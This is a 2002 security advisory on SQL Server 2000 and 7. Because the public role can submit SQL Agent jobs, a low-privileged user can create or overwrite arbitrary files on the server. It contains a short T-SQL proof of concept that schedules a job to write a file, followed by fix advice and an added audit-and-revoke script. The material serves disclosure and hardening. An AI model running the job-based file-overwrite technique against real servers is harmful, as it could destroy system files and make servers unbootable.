[NT] Arbitrary File Creation/Overwrite with SQL Agent Jobs

From: support@securiteam.com
Date: 08/20/02


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Arbitrary File Creation/Overwrite with SQL Agent Jobs
------------------------------------------------------------------------

SUMMARY

With Microsoft SQL Server 2000 and 7 comes a "helper" service, the SQL
Server Agent. The Agent is responsible for restarting the database service
if it stops for some reason, plays a role in replication, and runs
scheduled jobs. Because the public role can, by default, submit jobs to the
SQL Agent, a low-privileged user can create or overwrite arbitrary files on
the SQL Server.

DETAILS

Vulnerable systems:
 * Microsoft SQL Server version 2000
 * Microsoft SQL Server version 7

When adding a job, one can specify the name of a file to which the results
of the Transact-SQL or CmdExec job step are written. If this file already
exists it is overwritten, and if it does not already exist a new file is
created. By constructing the query of the job, one can place arbitrary
contents in this file.

If the SQL Server Agent is running with Local SYSTEM privileges, an
attacker will be able to overwrite key operating system files, rendering
the server unbootable.

Proof of Concept:
-- ArbitraryFileCreate
-- For this to work the SQL Agent should be running.
-- Further, you'll need to change SERVER_NAME in
-- sp_add_jobserver to the SQL Server of your choice

--
-- David Litchfield
-- (david@ngssoftware.com)
-- 19th August 2002

USE msdb

EXEC sp_add_job @job_name = 'ArbitraryFileCreate', @enabled = 1, @description = 'This will create a file called c:\sqlafc123.txt', @delete_level = 1

EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate', @step_name = 'SQLAFC', @subsystem = 'TSQL', @command = 'select ''hello, this file was created by the SQL Agent.''', @output_file_name = 'c:\sqlafc123.txt'

EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate', @server_name = 'SERVER_NAME'

EXEC sp_start_job @job_name = 'ArbitraryFileCreate'

Fix Information: NGSSoftware informed Microsoft of these issues in July. To
prevent low-privileged users from submitting jobs, disallow public access
to the job-related stored procedures in the msdb database, particularly:
 * sp_add_job
 * sp_add_jobstep
 * sp_add_jobserver
 * sp_start_job

Further to this, ensure that the SQL Server Agent is running as a
low-privileged NT account.
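The following script is an added defensive example, not part of the original advisory or NGSSoftware's code. It audits an msdb instance for job steps that already write output files, checks whether public still holds EXECUTE on the four procedures named above, and then revokes that grant. It assumes SQL Server 2000 system tables (sysjobs, sysjobsteps, sysprotects, sysobjects) and a caller in the sysadmin role.

```sql
-- Added example: audit and harden msdb against job output-file abuse.
-- Assumes SQL Server 2000 system tables and sysadmin privileges.
USE msdb
GO

-- 1. Which job steps already write an output file, and who owns the job?
--    Unexpected owners, or paths outside the Agent's log directory,
--    warrant review (and are a useful thing to alert on going forward).
SELECT j.name                    AS job_name,
       SUSER_SNAME(j.owner_sid)  AS owner_login,
       s.step_id,
       s.subsystem,
       s.output_file_name,
       j.date_created
FROM   dbo.sysjobs j
       JOIN dbo.sysjobsteps s ON s.job_id = j.job_id
WHERE  s.output_file_name IS NOT NULL
ORDER  BY j.date_created DESC
GO

-- 2. Does the public role still hold EXECUTE on the job procedures?
--    In sysprotects: uid 0 = public, action 224 = EXECUTE,
--    protecttype 204/205 = GRANT, 206 = DENY.
SELECT o.name AS procedure_name,
       CASE p.protecttype WHEN 206 THEN 'DENY' ELSE 'GRANT' END AS state
FROM   dbo.sysprotects p
       JOIN dbo.sysobjects o ON o.id = p.id
WHERE  p.uid = 0
  AND  p.action = 224
  AND  o.name IN ('sp_add_job', 'sp_add_jobstep',
                  'sp_add_jobserver', 'sp_start_job')
GO

-- 3. Remove the grant. Logins that legitimately schedule jobs should be
--    given EXECUTE on these procedures explicitly (or via a dedicated
--    role) rather than inheriting it through public.
REVOKE EXECUTE ON dbo.sp_add_job       FROM public
REVOKE EXECUTE ON dbo.sp_add_jobserver FROM public
REVOKE EXECUTE ON dbo.sp_add_jobstep   FROM public
REVOKE EXECUTE ON dbo.sp_start_job     FROM public
GO
```

After step 3, re-running the step 2 query should return no rows; if it still does, the permission was granted through a path other than public and needs to be traced with sp_helprotect.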

ADDITIONAL INFORMATION

The original advisory can be viewed at: http://www.ngssoftware.com/advisories/mssql-espjobs2.txt

The information has been provided by David Litchfield (david@ngssoftware.com) of NGSSoftware Insight Security Research.
